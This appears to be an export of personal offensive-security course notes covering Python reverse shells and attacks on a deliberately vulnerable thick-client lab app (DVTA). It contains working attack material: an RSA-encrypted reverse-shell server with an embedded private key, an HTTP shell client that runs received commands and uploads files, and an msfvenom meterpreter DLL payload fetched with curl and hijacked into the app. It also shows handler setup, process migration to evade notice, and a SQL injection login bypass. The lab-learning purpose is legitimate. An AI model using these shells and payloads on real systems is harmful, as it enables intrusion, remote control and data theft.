'''-----BEGIN RSA PRIVATE KEY-----\n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\nEu0pz2ky3dqa23OxE
TTdduDVD6PMvxMG0ibxKgvRaxzIk9WuurSliNGoKBG5o/zn\neGpSyoyhr3O4ycVDawfihg3xFin2xUf7W9WuNDFmri9YjSFY6cgkrYCTRBZG8E2Z\nDcR/LbI9nR4UGHhetfHjj5xZZcjy1oQM4+QcT2xH4PTFD0qLzDUM3fU87v4Y6uv4\n711AIQKCAQEAjp9ILxWMdmhkgK88zpKLKaVWjuo+QvX1EwCPYar2RsCOCFcCtT/w\nVQ3EtcnUrC5MOrONvLFJ9i79/lkZLF8vr4YT5bkZxxSBvCdWAj7mIxX28rHazlwp\n9nuy9zT4L22y3U/UXbKxOZ1+7cSBwNeIgzaahph9AJrQuyPrCkVJFzp/TmUPrF7o\noVKbN7Ht2E/bWcWuFB/l6FfHRIfpseZFvFW5GigaEnqrchfGbwuELvPBHxdjdO0u\nUX4gSbTQH7w7O6BT6wdE++wBCYV9oq4yFgQX5lzPbACBvyPUnckvqHOX2IDdByW3\nrClVLOp+cq8f3kNZvoHrkqy2Ki2jS/hzsQKCAQB+A7OrM+7hns9bRKxm/SGChTx3\n73c2IrGepgN/ra5eXNi/aywvpy+yOrorDcJ3gfTMg4yeVnqA/FcOMWQkpbHbtXAm\nHDT/tc4t88SR2Z/gzt1ZAIT+dB2N5T0qV91ZTUm5XxIRfHiT/D3rokDzYbnQQKwl\nyExyM9RINW9wIO19KNxDpS0TbcB0bkpYgn5f+bAvJ7Pe6Xof88DUrhoy3PnYHNYY\naH+BJDcZLlE/MpIXXgy+2afo7MkNBTS6jLPihnC447QhWZ2ufp2/dHnwy2XMJcsE\n76tuOr1FELvtzE3z2BE9OvCJj4Mb3grRMD35Q1Aqd4TAgSF2Okl2EsmR/wf9\n-----END RSA PRIVATE KEY-----'''\n    private_key = RSA.importKey(privatekey)\n    decryptor = PKCS1_OAEP.new(private_key)\n    dec = decryptor.decrypt(cipher)\n    return dec.decode()\ndef connect():\n    s = socket.socket()\n    s.bind(('192.168.0.152', 8080))\n    s.listen(1)\n    print('[+] Listening for incoming TCP connection on port 8080')\n    conn, addr = s.accept()\n\n    while True:\n        store = ''\n        command = input(\"Shell> \")\n        if 'terminate' in command:\n            conn.send('terminate'.encode())\n            conn.close()\n            break\n        else:\n            command = encrypt(command.encode())\n            conn.send(command)\n            result = conn.recv(1024)\n            try:\n                print(decrypt(result))\n            except:\n                print(\"[-] unable to decrypt/receive data!\")\n\nconnect()\n
                                  ","tags":["python","python pentesting","scripting","reverse shell","encryption","rsa"]},{"location":"python/tunning-the-connection-attemps/","title":"Tunning the connection attempts","text":"

                                  From course: Python For Offensive PenTest: A Complete Practical Course.

                                  General index of the course
                                  • Gaining persistence shells (TCP + HTTP):
                                    • Coding a TCP connection and a reverse shell.
                                    • Coding a low level data exfiltration - TCP connection.
                                    • Coding an http reverse shell.
                                    • Coding a data exfiltration script for a http shell.
  • Tuning the connection attempts.
                                    • Including cd command into TCP reverse shell.
                                  • Advanced scriptable shells:
  • Using a Dynamic DNS instead of your bare attacker public IP.
                                    • Making your binary persistent.
                                    • Making a screenshot.
                                    • Coding a reverse shell that searches files.
                                  • Techniques for bypassing filters:
                                    • Coding a reverse shell that scans ports.
  • Hijack the Internet Explorer process to bypass a host-based firewall.
                                    • Bypassing Next Generation Firewalls.
                                    • Bypassing IPS with handmade XOR Encryption.
• Malware and cryptography:
                                    • TCP reverse shell with AES encryption.
                                    • TCP reverse shell with RSA encryption.
                                    • TCP reverse shell with hybrid encryption AES + RSA.
• Password Hijacking:
                                    • Simple keylogger in python.
                                    • Hijacking Keepass Password Manager.
                                    • Dumping saved passwords from Google Chrome.
                                    • Man in the browser attack.
                                    • DNS Poisoning.
                                  • Privilege escalation:
                                    • Weak service file permission.
                                  ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/tunning-the-connection-attemps/#client-side","title":"Client side","text":"

We put our previous HTTP shell in a function called connect().

import requests\nimport os\nimport subprocess\nimport time\n\nimport random # Needed to generate random sleep intervals\n\n\ndef connect(): # we put our previous http shell in a function called connect\n\n    while True:\n\n        req = requests.get('http://127.0.0.1:8080')\n        command = req.text\n\n        if 'terminate' in command:\n            return 1 # if we get the terminate order, we exit the connect function and return 1; this value is used to end the whole script\n\n\n        elif 'grab' in command:\n            grab, path = command.split(\"*\")\n            if os.path.exists(path):\n                url = \"http://127.0.0.1:8080/store\"\n                files = {'file': open(path, 'rb')}\n                r = requests.post(url, files=files)\n            else:\n                post_response = requests.post(url='http://127.0.0.1:8080', data='[-] Not able to find the file!'.encode())\n        else:\n            CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n            post_response = requests.post(url='http://127.0.0.1:8080', data=CMD.stdout.read())\n            post_response = requests.post(url='http://127.0.0.1:8080', data=CMD.stderr.read())\n\n        time.sleep(3) # throttle the polling loop between commands\n\n\n# Here we start our infinite loop: we try to connect to our Kali server; if we get an exception (connection error)\n# we sleep for a random time between 1 and 10 seconds, pass the exception, and go back to the\n# infinite loop until we get a successful connection.\n\n\nwhile True:\n    try:\n        if connect() == 1:\n            break\n    except:\n        sleep_for = random.randrange(1, 10) # Sleep for a random time between 1-10 seconds\n        time.sleep(int(sleep_for))\n        #time.sleep( sleep_for * 60 )      # Sleep for a random time between 1-10 minutes\n        pass\n
                                  ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"thick-applications/","title":"Introduction to Pentesting Thick Clients Applications","text":"

Checklist for pentesting thick client applications

                                  General index of the course

                                  • Introduction.
                                  • Tools for pentesting thick client applications.
                                  • Basic lab setup.
                                  • First challenge: enabling a button.
                                  • Information gathering phase.
                                  • Traffic analysis.
                                  • Attacking thick clients applications.
                                  • Reversing and patching thick clients applications.
                                  • Common vulnerabilities.

Thick client applications are applications that run standalone on the desktop. Thick clients have two attack surfaces:

                                  • Static.
                                  • Dynamic.

They are quite different from web applications in the sense that most tasks are performed at the client end, so these apps depend heavily on the client's system resources, such as CPU, RAM and disk.

                                  They are usually written in these languages:

                                  • .NET
                                  • C/C++
                                  • Java applets etc
• Native Android / iOS mobile applications: Objective-C, Swift
                                  • and more.

They are considered old technology, but they can still be found in some organizations.

                                  ","tags":["thick client applications","thick client applications pentesting"]},{"location":"thick-applications/#basic-architecture","title":"Basic Architecture","text":"
                                  • 1-Tier Architecture: It's a standalone application.
• 2-Tier Architecture: EXE / web-based launcher / Java-based app + database. Business logic lives in the application, which communicates directly with the database server. Things to consider when pentesting: login or registration features, DB connections, strings, TLS/SSL, registry keys.
• 3-Tier Architecture: EXE + server + database. Business logic can be moved to the server, so security findings will be less common. These apps don't have proxy settings in them, so to send traffic to a proxy server some changes need to be made in the system hosts file (see the sketch after this list).
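For illustration, a minimal sketch of that hosts-file change (my own, not from the course; app.example.local is a hypothetical hardcoded hostname) that points the app's server at a local proxy. Run it as administrator:

# Hypothetical sketch: point a hardcoded server hostname at a local proxy\n# by appending an entry to the Windows hosts file (requires admin rights)\nHOSTS = r'C:\\Windows\\System32\\drivers\\etc\\hosts'\nentry = '127.0.0.1    app.example.local    # route thick-client traffic to the proxy'\n\nwith open(HOSTS, 'a') as hosts_file:\n    print(entry, file=hosts_file)  # print() appends the trailing newline\n

After this, traffic for that hostname resolves to 127.0.0.1, where the proxy can listen.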
                                  ","tags":["thick client applications","thick client applications pentesting"]},{"location":"thick-applications/#some-decompilation-tools","title":"Some decompilation tools","text":"
                                  • C++ decompilation: https://ghidra-sre.org
                                  • C# decompilation: dnspy.
                                  • JetBrains dotPeek.
                                  ","tags":["thick client applications","thick client applications pentesting"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/","title":"Attacking thick clients applications: Data storage issues","text":"

                                  General index of the course

                                  • Introduction.
                                  • Tools for pentesting thick client applications.
                                  • Basic lab setup.
                                  • First challenge: enabling a button.
                                  • Information gathering phase.
                                  • Traffic analysis.
                                  • Attacking thick clients applications.
                                  • Reversing and patching thick clients applications.
                                  • Common vulnerabilities.
                                  ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#1-hard-coded-credentials","title":"1. Hard Coded credentials","text":"

Developers often hardcode sensitive details in thick clients.

                                  ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#strings","title":"strings","text":"

Strings comes with the Sysinternals Suite. It is similar to the \"strings\" command in bash: it displays all the human-readable strings in a binary:

                                  strings.exe C:\\Users\\admin\\Desktop\\tools\\original\\DVTA.exe > C:\\Users\\admin\\Desktop\\strings.txt\n
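If strings.exe is not at hand, a minimal Python stand-in (my own sketch, not part of the Sysinternals suite) extracts the same kind of printable runs:

import re\nimport sys\n\n# Minimal stand-in for strings.exe: print printable ASCII runs of 4+ characters\ndata = open(sys.argv[1], 'rb').read()\nfor match in re.finditer(rb'[ -~]{4,}', data):\n    print(match.group().decode())\n

Run it as: python pystrings.py DVTA.exe > strings.txt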

                                  ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#dnspy","title":"dnspy","text":"

We know the FTP connection is made from the Admin screen, so we open the application with dnspy and locate the button in the Admin screen that triggers the FTP connection. Credentials for the connection can be there:

                                  ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#2-storing-sensitive-data-in-registry-entries","title":"2. Storing sensitive data in Registry entries","text":"","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#regshot","title":"regshot","text":"

1. Run the regshot version that matches your thick app (x86 or x64).

                                  2. Click on \"First shot\". It will make a \"shot\" of the existing registry entries.

3. Open the app you want to test and log in to it.

4. Perform some kind of action, for instance viewing the profile.

                                  5. Take a \"Second shot\" of the Registry entries.

                                  6. After that, you will see the button \"Compare\" enabled. Click on it.

                                  An HTML file will be generated and you will see the registry entries:

                                  An interesting registry is \"isLoggedIn\", that has change from false to true. This may be a potential vector of attack (we could set it to true and also change username to admin).

                                  HKU\\S-1-5-21-1067632574-3426529128-2637205584-1000\\dvta\\isLoggedIn: \"false\"  \nHKU\\S-1-5-21-1067632574-3426529128-2637205584-1000\\dvta\\isLoggedIn: \"true\"\n
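To test that vector, a short sketch using Python's built-in winreg module; it assumes the dvta key lives under HKEY_CURRENT_USER, which is what the HKU\\<SID> path above maps to for the current user:

import winreg\n\n# Flip the dvta 'isLoggedIn' flag; HKU\\<SID>\\dvta maps to HKCU\\dvta for the current user\nkey = winreg.OpenKey(winreg.HKEY_CURRENT_USER, 'dvta', 0, winreg.KEY_SET_VALUE)\nwinreg.SetValueEx(key, 'isLoggedIn', 0, winreg.REG_SZ, 'true')\nwinreg.CloseKey(key)\n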

                                  ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#3-database-connection-strings-in-memory","title":"3. Database connection strings in memory","text":"

When the application connects to the database, the connection string may be:

                                  • in clear text
                                  • or encrypted.

If encrypted, it is still possible to find it in memory: if we can dump the memory of the process, we should be able to find the clear-text connection string there.
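This hunt can also be scripted. Assuming the process memory has already been dumped to a file (for example with Process Hacker or procdump), a rough sketch that scans the dump for connection-string markers:

import re\nimport sys\n\n# Scan a raw process-memory dump for likely connection-string material\nMARKERS = [rb'[Dd]ata [Ss]ource=[ -~]{0,200}', rb'[Pp]assword=[ -~]{0,100}']\n\ndata = open(sys.argv[1], 'rb').read()\nfor pattern in MARKERS:\n    for match in re.finditer(pattern, data):\n        print(match.group().decode(errors='replace'))\n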

                                  ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#process-hacker-tool","title":"Process Hacker tool","text":"

                                  Download from: https://processhacker.sourceforge.io/downloads.php

                                  We will be using the portable version.

                                  1. Open the application you want to test.

                                  2. Open Process Hacker Tool.

3. Select the application, right-click on it and choose \"Properties\".

                                  4. Select tab \"Memory\".

                                  5. Click on \"Strings\".

                                  6. Check \"Image\" and \"Mapped\" and search!

                                  7. In the results you can use the Filter option to search for (in this case) \"data source\".

Other possible searches: \"Decrypt\". A clear-text connection string in memory reveals credentials: pwned!!!

                                  ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#4-sql-injection","title":"4. SQL injection","text":"

If input is not sanitized, when logging in to an app we can deceive the logic of the query sent to the database:

select * from users where username='x' and password='x';\n

                                  In the DVTA app, we could try to do this:

select * from users where username='x' or 'x'='x' and password='' or 'x'='x';\n

                                  For that we only need to enter this into the login page:

                                  x' or 'x'='x\n

                                  And now we are ... raymond!!!
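To see why the payload works, here is a small self-contained sketch (using Python's sqlite3 as a stand-in for the real SQL Server backend) that builds the query by string concatenation, which is exactly the mistake the vulnerable app makes:

import sqlite3\n\n# Stand-in demo: sqlite3 instead of the real SQL Server backend\nconn = sqlite3.connect(':memory:')\nconn.execute(\"CREATE TABLE users (username TEXT, password TEXT)\")\nconn.execute(\"INSERT INTO users VALUES ('raymond', 'raymond')\")\n\nusername = \"x' or 'x'='x\"  # attacker-controlled input\npassword = \"x' or 'x'='x\"\n\n# Vulnerable: string concatenation lets the quotes rewrite the query logic\nquery = \"select * from users where username='\" + username + \"' and password='\" + password + \"'\"\nprint(conn.execute(query).fetchall())  # returns raymond's row despite bogus credentials\n\n# Safe: a parameterized query treats the payload as plain data\nprint(conn.execute(\"select * from users where username=? and password=?\", (username, password)).fetchall())  # []\n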

                                  ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#5-side-channel-data-leaks","title":"5. Side channel data leaks","text":"

Application logs are an example of side-channel data leaks. Developers often use logs for debugging purposes during development.

Where can you find those logs? For example, in the console output. Open the command prompt and run the vulnerable thick application this way:

                                  dvta.exe > C:/Users/admin/Desktop/dvta_logs.txt\n

After that, open the DVTA application, log in as admin and perform some actions. When done, close the application.

If you want to add more logs from a different user, open the app again from the console and append the new output to the file:

                                  dvta.exe >> C:/Users/admin/Desktop/dvta_logs.txt\n

Now, log in to the app as a regular user and browse around.

Open the file with the application logs and, if you are lucky and debug mode is still on, you will see things such as SQL queries, decrypted database passwords, users, and the temporary location of the FTP file.
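To triage a large capture, a small sketch (path as used above; the keyword list is my own guess) that greps the log for sensitive terms:

# Triage the captured console logs for likely secrets (path as used above)\nKEYWORDS = ['password', 'select', 'insert', 'ftp', 'decrypt', 'data source']\n\nfor line in open(r'C:\\Users\\admin\\Desktop\\dvta_logs.txt', errors='ignore'):\n    if any(word in line.lower() for word in KEYWORDS):\n        print(line.rstrip())\n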

                                  ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#6-unreliable-data","title":"6. Unreliable data","text":"

Some applications log data (for instance, timestamps) for later use. If the user is able to tamper with this data, the application ends up relying on untrusted input.

                                  ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#7-dll-hijacking","title":"7. DLL Hijacking","text":"","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#what-is-dll-hijacking","title":"What is DLL Hijacking","text":"

A Dynamic Link Library (DLL) file usually holds executable code that can be used by other applications, meaning it can act as a library. This makes DLL files very attractive to attackers, because if they manage to deceive the application into loading a different DLL (with the same name), they may end up compromising the host.

                                  ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#how-is-dll-hijacking-perform","title":"How is DLL Hijacking perform?","text":"

When an application loads a DLL without providing an absolute path, there are several techniques to deceive the app.

                                  ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#placing-our-dll-in-the-directory-in-which-the-app-will-look","title":"Placing our DLL in the directory in which the app will look","text":"

This is the default DLL search order (a small sketch after the list shows how the first match wins):

                                  • The directory from which the application is loaded.
                                  • The current directory.
                                  • The system directory
(C:\\Windows\\System\\)\n
                                  • The 16-bit system directory.
                                  • The Windows directory.
                                  • The directories that are listed in the PATH environment variable.
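A sketch of how that order plays out (directories are illustrative): the first directory containing a file with the requested name wins, which is why a writable directory early in the list enables hijacking:

import os\n\n# Simplified model of the Windows DLL search order: the first hit wins,\n# which is why a writable directory early in the list enables hijacking\nSEARCH_ORDER = [\n    r'C:\\Users\\admin\\Desktop\\tools\\original',  # application directory\n    os.getcwd(),                                # current directory\n    r'C:\\Windows\\System32',                    # system directory\n    r'C:\\Windows',                             # Windows directory\n] + os.environ.get('PATH', '').split(os.pathsep)\n\ndef resolve_dll(name):\n    for directory in SEARCH_ORDER:\n        candidate = os.path.join(directory, name)\n        if os.path.exists(candidate):\n            return candidate\n    return None\n\nprint(resolve_dll('DWrite.dll'))\n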
                                  ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#1-locate-interesting-dll-files-with-processmonitor-or-procmon","title":"1. Locate interesting DLL files with ProcessMonitor (or ProcMon)","text":"

We can try to find DLL files that the app requests but does not find. For that we can use Process Monitor (ProcMon) with filters like:

                                  • Process Name is DVTA.exe
                                  • Result is NAME NOT FOUND
                                  • Path ends with dll.

If you log in to the app, you will find some DLL files that can be targeted for exploitation:

                                  ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#2-crafting-our-malicious-dll-and-serving-them-to-the-machine","title":"2. Crafting our malicious DLL and serving them to the machine","text":"

We will assume we are trying to deceive the app with these 2 files:

                                  • SECUR32.dll
                                  • DWrite.dll

We will open a Kali machine, craft two DLL payloads using msfvenom, copy them into the Apache web root, and launch Apache to serve those two files. Commands:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IPAttacker> LPORT=4444 -a x86 -f dll > SECUR32.dll\n# -p: the chosen payload\n# -a: architecture of the victim machine/application\n# -f: format for the output file\n\n# Copying payloads to the Apache root folder\nsudo cp SECUR32.dll /var/www/html/\ncp SECUR32.dll DWrite.dll\nsudo cp DWrite.dll /var/www/html\n\n# Starting Apache\nservice apache2 start\n
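As an alternative to Apache, assuming Python 3 is available on the Kali machine, the standard library http.server module (the programmatic equivalent of python3 -m http.server 80) can serve the two DLLs from the current directory:

from http.server import HTTPServer, SimpleHTTPRequestHandler\n\n# Serve the current directory (containing the DLLs) over HTTP on port 80\nHTTPServer(('0.0.0.0', 80), SimpleHTTPRequestHandler).serve_forever()\n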

Now, in the Windows 10 VM (perhaps after disabling Real-Time Protection), we can retrieve those files with:

curl http://10.0.2.15/SECUR32.dll --output C:\\Users\\admin\\Desktop\\SECUR32.dll\ncurl http://10.0.2.15/DWrite.dll --output C:\\Users\\admin\\Desktop\\DWrite.dll\n
                                  ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#3-launching-the-attack","title":"3. Launching the attack","text":"

Place the crafted DLL file into the same folder as the application. In my case I will place DWrite.dll into

                                  C:\\Users\\admin\\Desktop\\tools\\original\n

On the Kali machine, start Metasploit and set up a handler:

                                  msfconsole\n
use exploit/multi/handler\nset payload windows/meterpreter/reverse_tcp\nset LHOST 10.0.2.15\nset LPORT 4444\nrun\n

Now you can start the application on the Windows machine, and the listener handler in Kali will catch a Meterpreter session.

                                  ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#4-moving-your-meterpreter-to-a-different-process","title":"4. Moving your meterpreter to a different process","text":"

List all processes in Meterpreter and migrate to a less suspicious one. This will also unblock the DVTA app on the Windows machine:

                                  ps\nmigrate <ID>\n
                                  ","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-attacking-thick-clients-applications/#how-to-connect-to-a-database-after-getting-the-credentials","title":"How to connect to a database after getting the credentials","text":"","tags":["thick client applications","thick client applications pentesting","strings","dnspy","regshot","process hacker tool","sql injection","dll hickjacking"]},{"location":"thick-applications/tca-basic-lab-setup/","title":"Basic Lab Setup - Thick client Applications","text":"

                                  General index of the course

                                  • Introduction.
                                  • Tools for pentesting thick client applications.
                                  • Basic lab setup.
                                  • First challenge: enabling a button.
                                  • Information gathering phase.
                                  • Traffic analysis.
                                  • Attacking thick clients applications.
                                  • Reversing and patching thick clients applications.
                                  • Common vulnerabilities.
                                  ","tags":["thick client applications","thick client applications pentesting","labs"]},{"location":"thick-applications/tca-basic-lab-setup/#environment-description","title":"Environment description","text":"
                                  • VirtualBox or VMWare Installation workstation.
                                  • Windows 10 VM 1 (database) -> SQL server.
                                  • (optional) Windows 10 VM 2 (client) -> DVTA.

In the course we will be using a single Windows 10 machine with both the SQL Server and the DVTA application installed, so there is no need for a second Windows 10 VM.

                                  ","tags":["thick client applications","thick client applications pentesting","labs"]},{"location":"thick-applications/tca-basic-lab-setup/#software-resources","title":"Software resources","text":"
                                  • Get windows 10 iso from: Repo for legacy Operating system.
                                  • Damn Vulnerable Thick Client Application DVTA (modified version given in the course): https://drive.google.com/open?id=1u46XDgVpCiN6eGAjILnhxsGL9Pl2qgcD.
• SQL Server Express 2008: SQL Server® 2008 R2 SP2.
                                  • SQL Server Management Studio SQL Server Management Studio (SSMS).
                                  • Filezilla FTP Server: FileZilla Server for Windows (64bit x86) (filezilla-project.org).

                                  Now, open the Windows 10 VM and start the lab setup!

                                  ","tags":["thick client applications","thick client applications pentesting","labs"]},{"location":"thick-applications/tca-basic-lab-setup/#1-install-sql-server-express-2008","title":"1. Install SQL Server Express 2008","text":"

On the download page we will choose SQLEXPR_x64_ENU.exe.

                                  Some helpful tips and screenshots about the installation:

                                  ","tags":["thick client applications","thick client applications pentesting","labs"]},{"location":"thick-applications/tca-basic-lab-setup/#2-install-sql-server-management-studio-1901","title":"2. Install SQL Server Management Studio 19.0.1","text":"

This installation is pretty straightforward. Download page

                                  ","tags":["thick client applications","thick client applications pentesting","labs"]},{"location":"thick-applications/tca-basic-lab-setup/#creating-database-dtva-four-our-vuln-thick-app","title":"Creating database DTVA four our vuln thick app","text":"

                                  We will create the database \"DVTA\" and we will populate it with some users and expenses:

                                  1. Open SSMS (SQL Server Management Studio) and right click on the \"Database\" object, and create a new database called DVTA.

                                  2. Create a new table \"users\" in the database DVTA.

                                  Here is the query:

                                  CREATE TABLE \"users\" (\n    \"id\" INT IDENTITY(0,1) NOT NULL,\n    \"username\" VARCHAR(100) NOT NULL,\n    \"password\" VARCHAR(100) NOT NULL,\n    \"email\" VARCHAR(100) NULL DEFAULT NULL,\n    \"isadmin\" INT NULL DEFAULT '0',\n    PRIMARY KEY (\"id\")\n)\n

                                  3. Populate the database with 3 given users:

                                  Here is the query:

                                  INSERT INTO dbo.users (username, password, email, isadmin)\nVALUES\n('admin','admin123','admin@damnvulnerablethickclientapp.com',1),\n('rebecca','rebecca','rebecca@test.com',0),\n('raymond','raymond','raymond@test.com',0);\n

                                  4. Create the table \"expenses\" in the database DVTA.

                                  Here is the query:

                                  CREATE TABLE \"expenses\" (\n    \"id\" INT IDENTITY(0,1) NOT NULL,\n    \"email\" VARCHAR(100) NOT NULL,\n    \"item\" VARCHAR(100) NOT NULL,\n    \"price\" VARCHAR(100) NOT NULL,\n    \"date\" VARCHAR(100) NOT NULL,\n    \"time\" VARCHAR(100) NULL DEFAULT NULL,\n    PRIMARY KEY (\"id\")\n)\n
                                  ","tags":["thick client applications","thick client applications pentesting","labs"]},{"location":"thick-applications/tca-basic-lab-setup/#adittional-configurations","title":"Adittional configurations","text":"

Some configurations need to be done so the connection works:

1. Open SQL Server Configuration Manager and enable TCP/IP protocol connections:

                                  2. Also in SQL Server Configuration Manager, restart SQL Server (SQLEXPRESS)

                                  ","tags":["thick client applications","thick client applications pentesting","labs"]},{"location":"thick-applications/tca-basic-lab-setup/#3-install-filezilla-ftp-server","title":"3. Install Filezilla FTP server","text":"

                                  1. Download Filezilla Server, install it and initiate a connection: Download page

As for the connection initiation, I'm using localhost 127.0.0.1, port 14148 and the password \"filezilla\":

                                  2. Add a user. Name \"dvta\" and password \"p@ssw0rd\"

3. Add a shared folder. Be careful with slashes and backslashes (wink!) so as not to get the typical error \"error on row number 1 virtual path must be absolute\".
